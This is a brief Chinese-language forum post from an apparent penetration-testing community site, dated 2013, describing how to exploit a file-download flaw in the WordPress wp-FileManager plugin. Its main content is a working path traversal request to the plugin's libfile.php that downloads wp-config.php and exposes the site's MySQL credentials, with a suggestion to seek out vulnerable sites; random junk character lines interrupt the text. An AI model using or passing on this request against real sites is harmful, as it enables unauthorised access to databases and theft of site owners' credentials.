中国网络渗透测试联盟
标题:
WordPress-wp-FileManager-File-Download漏洞利用方法
[打印本页]
作者:
admin
时间:
2013-7-26 12:43
标题:
WordPress-wp-FileManager-File-Download漏洞利用方法
洞详解:
http://packetstormsecurity.com/f ... -File-Download.html
9 w! L* U7 y" @5 e. T- M
+ X' C7 J, q# ~! u4 D7 y
查找漏洞网站:访问/wp-content/plugins/wp-filemanager/incl/libfile.php?&path=../../&filename=wp-config.php&action=download,下载wp-config,其中回显MySQL。
3 O+ i2 F' Y: _) m* Y# X2 @
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2